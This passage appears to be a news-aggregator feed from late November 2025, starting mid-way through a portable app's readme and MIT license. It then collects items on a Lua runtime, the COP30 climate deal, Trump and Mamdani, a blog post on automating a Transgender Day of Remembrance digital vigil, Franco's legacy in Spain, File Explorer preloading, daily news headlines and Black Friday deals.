  • Operate on less powerful hardware to facilitate operation on a broad spectrum of computers
  • Require a less demanding API landscape to facilitate execution on a broad range of operating systems and software translation environments
  • Require no special software libraries be present in order to run, such as .NET or JAVA, unless typically pre-installed on the target operating system or execution environment
  • Not require an internet connection to run, unless the connection is required to fulfill the app's core function, such as a web server
  • Require no downloads, addons, or registration in order to run
  • Provide help and documentation offline via a built-in viewer, or by limited external means, such as Notepad
  • Be self-contained with all necessary files, data sets, and samples stored within its internal structure, such that access be provided preferably through direct enabling mechanisms
  • Store, hold and manage external app settings and user data in a local sub-folder, and that sub-folder be easily identifiable as belonging to the app
  • Provide a mostly consistent appearance and experience to the user across the widest possible range of operating systems and execution environments
  • Value backwards compatibility, and be able to actively make use of that older hardware and software
  • Possess a compact, bloat-free footprint

How to remove the app and what you should do first Make sure any app related data that is precious to you is backed up before you delete.

As a portable app does not install itself on your computer there will be no automatic uninstall option listed in Windows.  The app must be removed manually.  But this is not difficult.

First, ensure the options below are unselected before proceeding.  Click "Options > Settings" and deselect:
1. Start button link
2. Desktop link
3. Automatic Startup link

If these links are not removed they may linger due to the oddities of some versions of Windows and its often complex nature and protocols.

If this app is administered by a 3rd party system then that system should be used now to remove this app.  If not, then click the app menu button " " (top right) and select " Show App Folder".  An explorer window will display with the app's executable (*.exe) and storage folder listed.

Make sure any data precious to you has been backed up or moved out of the app's storage folder before proceeding.  When you're ready, close the app and right click on its EXE "<app name>.exe" and select the Delete option.  If a prompt appears, confirm your intention to delete.  Repeat for the storage folder.

The app is now removed from your computer, USB pen stick, or hard disk.

Help my app doesn't look right what should I do? If for some reason your app doesn't appear right, or you think you've turned on or off some important system setting but you're not sure which one or where, not to worry: you can restore the app's default settings in two easy steps.

Step 1:
From anywhere in the app press the "F2" key to display the "Restore Defaults" confirmation window.

Step 2:
When you're sure you're ready to proceed, click the "Restore Defaults" button.  The app will reset, restoring all key system settings to their safe defaults, including color, font size, zoom level, etc.

If you don't have a keyboard, or the "F2" key is not available / difficult to access, you can click the "Options" link from the top toolbar to display the options window, then click the "Restore Defaults..." button (bottom right of window), and lastly confirm by pressing the "Restore Defaults" button.  The app will reset / restore defaults.

MIT License Copyright 2025 Blaiz Enterprises ( www.blaizenterprises.com )

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Fast Lua runtime written in Rust

Hacker News
astra.arkforge.net
2025-11-24 13:57:53
Comments...
Original Article
-- Create a new server
local server = require("http").server.new()

-- Register a route
server:get("/", function()
    return "hello from default Astra instance!"
end)

-- You can also use the local variables within routes
local counter = 0
server:get("/count", function(request, response)
    -- consume the request body
    print(request:body():text())

    -- set status code (Optional)
    response:set_status_code(300)
    -- set headers (Optional)
    response:set_header("header-key", "header-value")

    counter = counter + 1
    -- and also can return JSON
    return { counter = counter }
end)

-- Configure the server
server.port = 3000

-- Run the server
server:run()

Climate Deal Excludes Fossil Fuel Phaseout as Wealthy Nations Place Burden "On the Backs of the Poor"

Democracy Now!
www.democracynow.org
2025-11-24 13:35:09
Global negotiations at the annual U.N. climate summit ended Saturday in Belém, Brazil, with a watered-down agreement that does not even mention fossil fuels, let alone offer a roadmap to phase out what are the primary contributors to the climate crisis. The COP30 agreement also makes no new commitme...
Original Article

Global negotiations at the annual U.N. climate summit ended Saturday in Belém, Brazil, with a watered-down agreement that does not even mention fossil fuels, let alone offer a roadmap to phase out what are the primary contributors to the climate crisis. The COP30 agreement also makes no new commitments to halt deforestation and does not address global meat consumption, another major driver of global warming.

“I’m angry at a really weak outcome. I’m angry at the fossil fuel lobbyists roaming the venue freely, while the Indigenous activists [were] met with militarized repression,” says Brandon Wu, director of policy and campaigns at ActionAid USA . “I have a special level of incandescent outrage at … the rich, developed countries of the Global North who come in to these conferences, and they act like they’re the heroes, when, in fact, what they’re doing is shifting the burden of a crisis that they caused onto the backs of the poor.”

“The absence of the United States is critical,” adds Jonathan Watts, global environment writer at The Guardian . “The United States under Donald Trump is trying to go backwards to the 20th century in a fossil fuel era, whereas a huge part of the rest of the world wants to move forward into something else.”



Guests
  • Brandon Wu

    director of policy and campaigns at ActionAid USA .

Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Automating updates to a digital vigil

Lobsters
ntietz.com
2025-11-24 13:20:39
Comments...
Original Article

November 20th each year is Transgender Day of Remembrance (TDoR) . It is a day when we memorialize those who've been lost to transphobia, through violence or suicide. And each year, I make the most difficult git commit of the year, updating the list of names in the digital vigil that I made a few years ago.

I was late doing it this year, and I did it on November 20th last year. Ideally, it would be done early. I keep procrastinating it, because it's tough emotional work. Next year, I want it to be early , so... how do I actually get myself to do that?

The solution is either more therapy or more automation. So naturally, I decided on the automation! (Don't worry, I have a therapist that I love.)

We'll need to solve two main problems: updating the lists of names, and deploying it on a schedule.

Updating the names

The digital vigil is a static site, and we need to know all the names when it's built. All the names are stored in a couple of arrays of strings in a Rust file [1] . We'll want to update that file, which means we get to do codegen, baby!

Let's tackle getting the names first.

An authoritative source of names for TDoR vigils is the website Trans Lives Matter . This is where I download the report from each year for manual updates. It's a great source of data, and I'm only using a fraction of what is there.

I decided to write a Python script to pull the data. I got partway through the script using the same endpoint the human-consumable webpage offers for a download, when I realized it gives me a zip file . After opening a few too many tabs, I remembered: there's an API for this! Of course there's an API, and like all principal engineers working on their hobby projects, I didn't remember to check the obvious things first [2] . After switching to the API, I got JSON directly, and the data was super easy to retrieve.

Here's what that looks like.

import http.client
import json
import os

api_key = os.environ.get("TDOR_API_KEY")

def get_report(year, country="all"):
    """Retrieves the data for a given year's vigil.

    This will request the data from September 30 of the previous year through
    October 1 of the requested year.

    Params:
        - year:     (int) what year's vigil the data is for
        - country:  (str) scope of the data; default="all"

    """

    from_date = f"{year-1}-10-01"
    to_date = f"{year}-09-30"

    headers = { "User-Agent": "tdor-digital-vigil-bot" }
    path = f"/api/v1/reports/?key={api_key}&from={from_date}&to={to_date}&country={country}&category=&filter="

    conn = http.client.HTTPSConnection("tdor.translivesmatter.info")
    conn.request("GET", path, None, headers)

    resp = conn.getresponse()

    if resp.status != 200:
        print(f"Error: expected 200, got {resp.status} ({resp.reason})")
        exit(1)

    body = resp.read()
    data = json.loads(body)

    return data

The next portion is fun and straightforward: turning this into some Rust code! "Codegen" can make it sound fancy, but for a lot of problems like this, codegen can be really simple.

In this case, we just have a file that has two static arrays in it. The code generation is really easy: iterate through our list of names, but bracket them with lines that start and end our declarations.

It looks like this.

usa_data = get_report(2025, "usa")
all_data = get_report(2025, "all")

with open("src/names.rs", "w+") as f:
    all_names = [r["name"] for r in all_data["data"]["reports"]]
    usa_names = [r["name"] for r in usa_data["data"]["reports"]]

    f.write(f"pub const FULL_NAMES: [&'static str; {len(all_names)}] = [\n")
    for name in all_names:
        # escape embedded double quotes so the generated Rust stays valid
        escaped = name.replace('"', '\\"')
        f.write(f'    "{escaped}",\n')
    f.write("];\n")

    f.write("\n")

    f.write(f"pub const US_NAMES: [&'static str; {len(usa_names)}] = [\n")
    for name in usa_names:
        escaped = name.replace('"', '\\"')
        f.write(f'    "{escaped}",\n')
    f.write("];\n")

And generates a file like this.

pub const FULL_NAMES: [&'static str; 367] = [
    "Name Withheld",
    ...
];


pub const US_NAMES: [&'static str; 69] = [
    ...
];

It worked the first time! Definitely did not take me a few rounds of fixing silly bugs, no, definitely not. Anyway!

We've got that settled for this year. Now we need to automate it.

Deploying on a schedule

The first thing I did here was turn to my favorite simple automation solutions: Jenkins and Kubernetes. Of course, where's the fun in thinking about it ourselves? Let's vibe code it. I'll fire up Cursor using the latest Claude models and we can roll.

...

Ahahahaha no.

I'm not going to vibe code a single thing, especially not on something so dear to me as this. And we're not going to use Jenkins or Kubernetes here. Not that I don't love them (I don't, but that's beside the point), there's just no reason to use them for this.

And here, we don't need much technology at all. This could definitely be automated, to have deploys happen on a schedule without my involvement. But... all those systems would be a little fragile, and if you run a deploy once a year, it's going to break. Then you also need notifications for failures, and notifications for notification failures [3] .

That's a lot of complexity for very little effort saved each year. The problem I have isn't that the build is complicated. I just run make build then make deploy . The problem is that I forget .

And how do we solve forgetting? Reminders.

I'll be reminded next year on October 15th to update the digital vigil.

* * *

Automation can be hard, but I think the hardest thing about it is knowing where to strike the balance. What should you put in the effort for, and what should you just keep doing by hand?

For this problem, part of it benefited from automation code, and the other half from just setting myself reminders. It is all about reducing friction.

Okay, now I've made the hardest commit of the year, and I've written about it. I'm steeped in some emotions right now, so I'm going to go hug my wife and have some chocolate. Take care of yourself, and remember that you are loved.


  1. I know I'm a walking stereotype ("oh look, the trans woman loves Rust"). It's not my fault, I'm just that cool.

  2. Look, it's not my fault my brain turns off after hours. I'm just adhering to the old woodworking maxim: measure once, cut twice.

  3. It's notifications for failures all the way down.

If you're looking to grow more effective as a software engineer, please consider my coaching services .

From Affordability to Genocide, Trump-Mamdani Meeting at White House Was Full of Surprises

Democracy Now!
www.democracynow.org
2025-11-24 13:15:32
After months of mutual animosity, President Donald Trump and New York City Mayor-elect Zohran Mamdani met for the first time in a widely anticipated meeting late last week. But after the two discussed Mamdani’s plans to lower the cost of living in New York City, where both men grew up, Trump s...
Original Article

After months of mutual animosity, President Donald Trump and New York City Mayor-elect Zohran Mamdani met for the first time in a widely anticipated meeting late last week. But after the two discussed Mamdani’s plans to lower the cost of living in New York City, where both men grew up, Trump said that he and Mamdani “agree on a lot more than I would have thought” and promised to work together once Mamdani takes office in January. The newly friendly relationship is likely temporary, but still “remarkable,” says Ross Barkan, who is writing a book about Mamdani’s rapid political rise. “If Trump is less antagonistic towards Mamdani, the idea is to have Trump do as little damage as possible to New York City,” Barkan says of Mamdani’s conciliatory approach to the meeting. “He’s not going to attack. He’s going to try to build coalitions.”

Barkan also comments on the brewing intra-party conflict between the Democratic establishment and the more left-wing Democratic Socialists of America — whose members, including Mamdani, typically run for elected office as Democrats — as well as what Trump’s lack of challenge to Mamdani’s assertion that Israel is committing a genocide in Gaza says about the shifting discourse on Israel-Palestine in the United States.


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

50 Years After Franco’s Death: Vindicating Democratic Memory

Portside
portside.org
2025-11-24 13:14:04
50 Years After Franco’s Death: Vindicating Democratic Memory Kurt Stand Mon, 11/24/2025 - 08:14 ...
Original Article

“Those who are condemned to repeat the past are not those who do not remember it, but those who do not understand it.”
Daniel Giglioli


This 20th of November marks 50 years since the death of dictator Francisco Franco in Spain. On that day, Franco died in a hospital bed as the head of state of a country he ruled with an iron fist, authoritarian and violent, for 40 years, after winning our Civil War with the help of Hitler and Mussolini. After the war, Franco imposed a fascist and criminal regime that plunged my country into one of the darkest and saddest periods in its history.

And yet, the rise of the far right today calls into question the harshness of the regime that ravaged Spain for four decades. Today we are beginning to hear that Francoism was not so bad, that it was not such a big deal, that it was a soft dictatorship… we are beginning to hear, ever louder, the narcotic whisper of the deniers. A discourse is beginning to take hold that does not exactly defend Francoism, but does present it as a “soft” regime and denies, minimises, or sugarcoats the criminal and systemic nature of Franco’s repression. It is no longer the ranting of “Viva Franco”, arms raised and blue shirts (the shirts of the Falange , the Spanish version of Mussolini’s Blackshirts). It is more subtle.

The far right is sowing doubts about the consensus that has been reached until the whisper becomes an ordinary part of the conversation. The dispute over memory is one of its battlegrounds (as it is in Italy, Argentina, Hungary, and Spain), and although until now I understood it as a denial of the criminal past of the fascisms of which they are the heirs, the step further that this reactionary whisper is taking seems to have another intention, which I would summarise as follows: if it is accepted that a dictatorship was not such a bad thing, the idea of an authoritarian government becomes more socially acceptable. It’s that simple.

The reactionary moment in the West

One of the founding pillars of fascism in the past, and of the far right today, is the one that links democracy with misgovernment or corruption. Its model is what Viktor Orbán christened (and established) in Hungary, “illiberal democracy”, a euphemism behind which to hide an electoral autocracy. This is where the attack on democratic memory comes in, lest younger generations really know what fascism was, what Francoism was: blurring the memory of what an authoritarian far-right government really means in order to make it more acceptable.

At an event in Athens commemorating the 50th anniversary of the end of dictatorships in Spain, Greece, and Portugal, after hearing about the epic Carnation Revolution that overthrew the Portuguese dictatorship and the turmoil that brought down the Junta of the Colonels in Greece, I was left thinking, and when it was my turn to talk about the Spanish case, I could only begin with: “Well, in Spain, Franco died in his bed,” which made the audience smile. They immediately understood that in Spain there was no revolution, no crisis of the regime. In Spain, the dictator died shrouded in a cloak of silence and fear so thick that it covered up his crimes.

The facts are well known, but for those who minimise the criminal nature of the Franco regime, it is good to remember them, vindicate them, and continue to think about how it was possible:

between 115,000 and 130,000 disappeared; 150,000 murdered; 30,000 stolen children; 2,800 mass graves (the largest, the Valley of the Fallen, holds the remains of more than 30,000 people); 500,000 exiles; up to 300,000 political prisoners at the beginning of the military regime alone. Spain is the second country in the world with the most disappeared people in ditches. All these figures come from Judge Garzón’s investigation, to which we can add those of Javier Rodrigo: 188 concentration camps operated in Spain after the Civil War; and those of Julián Casanova, who estimated that 50,000 Reds were murdered between 1939 and 1946.

Read that last figure again. In her beautiful and essential essay El arte de invocar la memoria ( The Art of Invoking Memory , 2024), historian Esther López Barceló defines the Franco regime on the basis of that number: “The mass executions of the early years of the dictatorship laid the foundations for the new state.” The numbers of Franco’s repression are only the bloody tip of the iceberg of fear on which the dictatorship was built. It is good to remember this in the country that never judged it.

One country that did was Argentina. Every 24 March, mass marches take place in its cities in memory of the 30,000 people who disappeared during the military dictatorship. Today, Milei, very much in line with the above, reduces the number to 8,000 and downplays one of the bloodiest repressions of the 20th century. “There are 30,000,” shouts the crowd, in a dispute that is not about numbers, but about futures.

In the aforementioned essay by Esther López Barceló, I find a powerful idea that connects different ways of understanding memory. She tells us that while in Buenos Aires, she visited ESMA, one of the worst torture centres in the country of the disappeared: “I knew I was in a sanctuary, in a space still heavy with the air of violence, but I was not fully aware that I was in an area cordoned off by forensic scientists: the scene of a crime that was and continues to be under judicial investigation. Don’t blame me. ‘I come from the anomaly,’ I should have told them. Spain, the scene of the perfect crime. The one that has been hidden from us until we ignored it. Until we believed that it didn’t happen. That it never happened. I come from the country of the crime that didn’t happen.”

Because we know that it did, we know what happened, and we even have a Memory Law, and yet… in the Puerta del Sol (our ESMA), there is not a single sign of the torture, not even a plaque under the window where we all know that Julián Grimau, the communist leader murdered by the regime,  was thrown.

Invoking the memory that breaks them

To break the narrative that links Franco’s regime to a soft dictatorship , it is essential to talk about democratic memory, to recognise the fear imposed by mass graves. And the truth is that what really breaks them, what dismantles the reactionary whisper of “it wasn’t such a bad dictatorship”, is to do so from a place that questions them, that points them out, that tells them from the present that this wound still hurts us and that it is on this wound that we want to build a future where this will never happen again.

Years ago, David Becerra dazzled me in his study The Civil War as Literary Fashion (2015) with one of his discoveries: he denounces that for years the Civil War and Francoism have been recounted or novelised in an ahistorical way, that is, narrated from a present where the conflict is happily resolved, without a common thread, as if it had nothing to do with the conflicts of the present. As if the past and memory had no direct relationship with today and, more importantly, with our ability to project futures.

A memory for the future

“We have to learn to build a memory of resistance,” says Enzo Traverso, always lucid, and to do so, I think, we must bring the defeated out of “that perfect crime that was the repression of Francoism”, to use López Barceló’s apt words.

Using education as a tool for the future, because, as the phrase with which I begin this article strikes home, a generation that does not know, that is unaware, is doomed to repeat history. The far right disputes memory in order to open up the possibility of authoritarian government on the horizon of expectations. So let us continue to dispute the memory of resistance from the present so that our horizon is built from a different place: the idea that fascism will never return, ever again.

Marga Ferré is President of transform! europe and Co-President of The Foundation for Critical Studies / Fundación de Estudios Críticos FEC (Formerly Foundation for a Citizens’ Europe / Fundación por la Europa de los Ciudadanos), Spain.

transform! europe is a network of 38 European organisations from 22 countries, active in the field of political education and critical scientific analysis, and is the recognised political foundation corresponding to the Party of the European Left (EL). This cooperative project of independent non-profit organisations, institutes, foundations, and individuals intends to use its work in contributing to peaceful relations among peoples and a transformation of the present world.

Microsoft tests File Explorer preloading for faster performance

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 13:08:08
Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times on Windows 11 systems. [...]...
Original Article


Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times and performance on Windows 11 systems.

According to Microsoft, the app will load automatically once the feature is toggled on without visible changes to users, who should only notice faster File Explorer launches when accessing files and folders.

However, this is an optional feature, and those who prefer to disable preloading can uncheck "Enable window preloading for faster launch times" in File Explorer's Folder Options under the View tab.


"We're exploring preloading File Explorer in the background to help improve File Explorer launch performance," the Windows Insider Program Team said .

"Looking forward to your feedback! If you do encounter any issues, please file them in the Feedback Hub under Files Folders and Online Storage > File Explorer Performance, or Files Folders and Online Storage > File Explorer."

These File Explorer speed and performance improvements follow the May 2025 rollout of Startup Boost , a similar optional feature for Office applications that launches a Windows scheduled task automatically in the background during system logon to help Office apps load faster.

The feature preloads apps in a paused state, keeping them paused until launched or removed from memory to reclaim resources.

Context menu updates

Microsoft is also updating the File Explorer context menu to reduce clutter while maintaining easy access to less frequently used actions by reorganizing menu items into groups of similar tasks.

File Explorer context menu (Microsoft)

For instance, actions such as 'Compress to ZIP file,' 'Copy as Path,' 'Set as Desktop Background,' and image rotation options have been moved to a new "Manage file" flyout menu.

Additionally, cloud provider options such as 'Always Keep on this Device' and 'Free Up Space' now appear within their respective cloud provider flyouts, alongside the Send to My Phone option. The Open Folder Location command has also been repositioned next to 'Open' and 'Open with' for better grouping.

Microsoft also noted that the 'Manage file' label may change in future updates based on user feedback submitted through the Feedback Hub under Desktop Environment > Right-Click Context Menu.

These features are now rolling out to Windows Insiders in the Dev and Beta channels running Windows 11 25H2 who have installed the 26220.7271 (KB5070307) preview build.

Headlines for November 24, 2025

Democracy Now!
www.democracynow.org
2025-11-24 13:00:00
Israeli Airstrikes Kill at Least 24 Palestinians Despite U.S.-Brokered Ceasefire, Israeli Airstrike on a Beirut Suburb Kills 5 People, Including Hezbollah’s Acting Chief of Staff, Trump Admin Set to Designate Maduro and His Gov’t Allies as Members of a Foreign Terrorist Organization, U.S...
Original Article

Headlines November 24, 2025

Israeli Airstrikes Kill at Least 24 Palestinians Despite U.S.-Brokered Ceasefire

Nov 24, 2025

Funerals are being held in Gaza today after Israeli airstrikes killed at least 24 people on Saturday, despite the U.S.-brokered ceasefire that began on October 10. Gaza’s Government Media Office says Israel has violated the truce nearly 500 times in 44 days. Meanwhile, UNICEF reports that Israel has killed two children every day during the ceasefire. At least 67 children have been killed in Gaza in recent weeks. This is Ahmed Abu Shaweesh, whose relatives were killed in Israeli airstrikes over the weekend.

Ahmed Abu Shaweesh : “What’s the reason? Nobody knows. Aren’t we supposed to be in a truce? We’re looking at the house. We’ve been trying to forget this scene for a month. We’re starting to go back to our normal life. How are we supposed to go back to normal life? We are back to martyrs, back to destruction, back to injuries. What’s the reason? We’re confused. No one knows.”

Israeli Airstrike on a Beirut Suburb Kills 5 People, Including Hezbollah’s Acting Chief of Staff

Nov 24, 2025

In Lebanon, an Israeli airstrike on a Beirut suburb on Sunday killed five people and wounded 28, according to the Lebanese Health Ministry. Israel claims that it assassinated Hezbollah’s acting chief of staff. The attack comes despite a U.S.-brokered ceasefire between Hezbollah and Israel went into effect last year.

Ali Ammar : “There was a ceasefire under international auspices, led primarily by the United States of America. Since then, and since the announcement of the agreement and the halt of military operations, the Israeli enemy has remained persistent and addicted to continuing its aggression, targeting buildings, people and civilians. And you know that this area is a civilian area.”

Trump Admin Set to Designate Maduro and His Gov’t Allies as Members of a Foreign Terrorist Organization

Nov 24, 2025

The U.S.’s top military officer will visit Puerto Rico today as a U.S. Navy warship dispatches to the Caribbean. The visit by General Dan Caine, the chair of the Joint Chiefs of Staff, comes as the Trump administration is set to formally designate Venezuelan President Nicolás Maduro and his government allies as members of a foreign terrorist organization, “Cártel de los Soles.” The entity is not actually a cartel and is instead a reference to military officers and officials allegedly involved in corruption and other illegal activities in Venezuela. Reuters is reporting that the U.S. is also considering a new phase of covert operations in Venezuela. It would be a major escalation after U.S. airstrikes on alleged drug boats in recent weeks have killed more than 80 people. Meanwhile, six airlines have canceled their flights to Venezuela, after the Federal Aviation Administration warned of a “worsening security situation” and “heightened military activity” in the region.

U.S., Ukrainian and European Officials in Geneva to Discuss U.S. Proposal to End Russia’s War on Ukraine

Nov 24, 2025

U.S., Ukrainian and European officials are meeting in Geneva to discuss the U.S. proposal to end Russia’s war on Ukraine. The 28-point plan was negotiated by U.S. and Russian officials without the involvement of Ukraine. Reuters reports European negotiators submitted a modified version of the plan that reverses some of the proposed limits to the size of Ukraine’s military, as well as some territorial concessions. On Sunday Ukrainian President Volodymyr Zelensky once again praised the United States and President Trump, after Trump wrote on social media, ” UKRAINE ' LEADERSHIP ' HAS EXPRESSED ZERO GRATITUDE FOR OUR EFFORTS .” Meanwhile, Russia has continued deadly attacks on Ukrainian civilians, including a drone strike on Kharkiv on Sunday that killed four people and wounded 17 others.

Trump Repeatedly Praises Mamdani During Oval Office Meeting

Nov 24, 2025

Image Credit: White House photo

New York City Mayor-elect Zohran Mamdani met with President Trump at the White House Oval Office Friday. During the meeting, President Trump repeatedly praised Mamdani and said he would feel “very confident that he can do a very good job.” President Trump also said he would feel “comfortable” living in New York under Mamdani’s leadership. Speaking to reporters, Mamdani maintained his past criticisms of President Trump.

Jacqui Heinrich : “Are you affirming that you think President Trump is a fascist?”

Mayor-elect Zohran Mamdani : “I’ve spoken about the” —

President Donald Trump : “That’s OK. You can just say yes. So” —

Mayor-elect Zohran Mamdani : “OK. All right.”

President Donald Trump : “OK?”

Mayor-elect Zohran Mamdani : “Yeah.”

President Donald Trump : “It’s easier.”

Mayor-elect Zohran Mamdani : “Yeah.”

President Donald Trump : “It’s easier than explaining it. I don’t mind.”

On Sunday, Mamdani doubled down on his views that President Trump is a fascist and a despot in an interview with NBC’s “Meet the Press.”

Kristen Welker : “Do you think that President Trump is a fascist?”

Mayor-elect Zohran Mamdani : “And after President Trump said that, I said, 'Yes.' And” —

Kristen Welker : “So you do?”

Mayor-elect Zohran Mamdani : “And that’s something that I’ve said in the past. I say it today. And I think what I appreciated about the conversation that I had with the president was that we were not shy about the places of disagreement, about the politics that has brought us to this moment.”

We’ll have more on Mamdani’s meeting with President Trump later in the broadcast.

Democratic Lawmakers File Police Complaints After Trump’s Posts Accuse Them of “Seditious Behavior”

Nov 24, 2025

Several Democratic lawmakers have filed police complaints after President Trump called for them to be put to death for what he called “seditious behavior.” Trump’s threat came after six lawmakers — who are veterans of the military or CIA — called on active-duty service members to refuse illegal orders. Congressmembers Jason Crow, Chris Deluzio and Chrissy Houlahan told the U.S. Capitol Police that Trump’s call for their execution has undermined their personal safety while putting the lives of congressional staffers at risk. Crow released audio of death threats phoned into his offices, while Deluzio reported his congressional offices in western Pennsylvania received bomb threats. On Friday, Trump doubled down on his threats, accusing the Democrats of ” SEDITION AT THE HIGHEST LEVEL .”

Trump Denied Federal Disaster Aid to Chicago Residents After Two Major Storms

Nov 24, 2025

President Trump denied federal disaster aid to thousands of Chicago residents, even though his administration documented extraordinary damage from two major storms this summer. That’s according to Politico, which reports it’s the first time since at least 2007 that any president has refused to help residents recover from such extensive damage to their homes. Trump’s denial stunned former FEMA officials. It comes after Trump said Illinois Governor JB Pritzker and Chicago Mayor Brandon Johnson should be jailed over their resistance to Trump’s surge of federal immigration agents and National Guard forces into the Chicago region.

ICE Agents in Oregon Violently Abduct 17-Year-Old High School Student on Lunch Break

Nov 24, 2025

In Oregon, federal immigration agents forced a 17-year-old high school student from his vehicle and abducted him as the teen took a lunch break on Friday. Video shows masked ICE agents smashed the driver’s side window of a car being driven by Christian Jimenez, a senior at McMinnville High School, who told them he was a U.S. citizen, to which an agent replied “get out of the car” and “I don’t care.” Jimenez’s brother says the teen was racially profiled and injured by shattered glass. He was taken to an ICE facility in Portland and released later that day. He’s been charged with “interference or obstruction of an investigation.”

SCOTUS Temporarily Restores Texas Congressional Map Declared an Illegal Gerrymander by Lower Court

Nov 24, 2025

The U.S. Supreme Court has temporarily restored Texas’s new congressional map that’s designed to allow Republicans to win up to five additional House seats in next year’s midterm elections. On Friday, Supreme Court Justice Samuel Alito paused a lower court ruling which stated that the new map was an illegal racial gerrymander. The high court has asked plaintiffs to respond by today before a final ruling on the congressional map.

50 Students Escape After Gunmen Abduct Hundreds from Catholic School in Nigeria

Nov 24, 2025

In Nigeria, 50 kidnapped students escaped their captors on Friday after gunmen stormed a Catholic boarding school and abducted over 300 children and 12 teachers last week. The Christian Association of Nigeria says the children who managed to escape have been reunited with their families. Now a major military-led search and rescue mission is underway to find the remaining children and teachers. Last week, gunmen stormed another boarding school and abducted 25 schoolgirls and killed the vice principal. The recent kidnappings have prompted officials to close 47 schools in northern Nigeria. President Bola Tinubu has also ordered the hiring of 30,000 more police officers, but Nigerians are calling for officials to take more action.

Elizabeth Awodeji : “We have seen our old women being kidnapped, being robbed in this country that we call giant of Africa. It is so bad. And the current government, they are not doing anything to what is happening.”

G20 Concludes Summit in South Africa Boycotted by U.S.

Nov 24, 2025

The G20 summit in South Africa concluded yesterday. It was the first time the event was held on the African continent. The United States boycotted the meeting, citing false allegations that South Africa was mistreating its white-minority Afrikaners. Leaders gathered at the summit adopted a joint declaration to address the climate crisis and other global challenges without input from the United States. The White House claimed that South Africa had “weaponized their G20 presidency to undermine the G20’s founding principles.” Meanwhile, Brazil’s President Luiz Inácio Lula da Silva declared the G20 summit in South Africa a success.

President Luiz Inácio Lula da Silva : “President Trump has been demonstrating this for several months now. He has already withdrawn from UNESCO and the World Trade Organization. He is attempting to preach the end of multilateralism in practice, trying to strengthen unilateralism. I believe multilateralism will prevail.”
Next year’s G20 summit will be held in the United States.

COP30 Climate Summit Concludes Without Agreement to Phase Out Fossil Fuels

Nov 24, 2025

In Belém, Brazil, the U.N. climate summit, known as COP30, has concluded without an agreement to phase out the use of coal, oil and gas, which are by far the largest contributors to global climate change. More than 80 countries had supported a transition away from fossil fuels, but they were blocked by oil-producing nations, including Russia, Saudi Arabia and the United Arab Emirates. This is Irene Vélez Torres, Colombia’s environment minister.

Irene Vélez Torres : “The root cause of this problem is fossil fuels. How are we dealing with that? How are we going to come out from this COP to say and to tell the people that we deny the most basic scientific truth, which is that the fossil fuels are the cause of more than 80% of the emissions that are generating climate change?”

The COP30 agreement also makes no new commitments to halt deforestation, nor does it address global meat consumption, another major driver of global heating. More than 1,600 fossil fuel industry lobbyists and 300 industrial agriculture lobbyists attended COP30; meanwhile, the Trump administration did not send a formal delegation, after the White House in January withdrew the U.S. from the Paris Climate Agreement for the second time.

Brazil’s Former President Jair Bolsonaro Arrested After Tampering with Ankle Monitor

Nov 24, 2025

Former Brazilian President Jair Bolsonaro has been arrested after he tampered with his ankle monitor while under house arrest. The arrest was ordered by Brazil’s Supreme Court Justice Alexandre de Moraes over fears that Bolsonaro would attempt to escape his compound, days before he was heading to prison. Back in September, Bolsonaro was sentenced to 27 years in prison for plotting a military coup against Brazil’s current President Luiz Inácio Lula da Silva.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.


The best Black Friday deals on the products we love, from sunrise alarm clocks to dehumidifiers

Guardian
www.theguardian.com
2025-11-24 12:56:27
We’ve cut through the noise to find genuinely good early Black Friday 2025 discounts on Filter-recommended products across home, tech, beauty and toys • Big savings – or big regrets? How to shop smart this Black Friday• The best Black Friday beauty deals Like Christmas Day, Black Friday has long sin...
Original Article

Like Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuletide now seems to start roughly when Strictly does, and Black Friday kicked off around Halloween, judging by the landfill of exclamation-marked emails weighing down my inbox.

Black Friday is a devil worth dancing with if you want to save money on products you’ve had your eye on – and it can pay to start dancing now. Some of the Filter’s favourite items are already floating around at prices clearly designed to make them sell out fast. Other deals won’t land until the big day itself on 28 November, or even until the daftly named Cyber Monday (1 December).

As ever, we’d encourage you not to buy anything unless you really need it and have the budget to do so – read our advice on how to shop smartly .

We’ll keep this page updated over the next few days with more genuine Black Friday bargains on the Filter’s favourites, from Anker battery packs to KidiZoom cameras via the espresso machine you loved more than any other product this year.


How we selected these deals (and excluded others)

The key to shopping smart on Black Friday, Cyber Monday or any discount event is to know what you want – and we’re here to help you target the good stuff. We’ve tested thousands of products at the Filter in 2025 and warmly recommended hundreds of them, including many that have genuinely good Black Friday discounts.

Instead of listing price cuts on all the products we’ve featured, we’ve focused on the things you’ve liked the most this year, and looked for deals that undercut their long-term average prices by a significant amount. Ideally, their Black Friday price will be their lowest of the year.

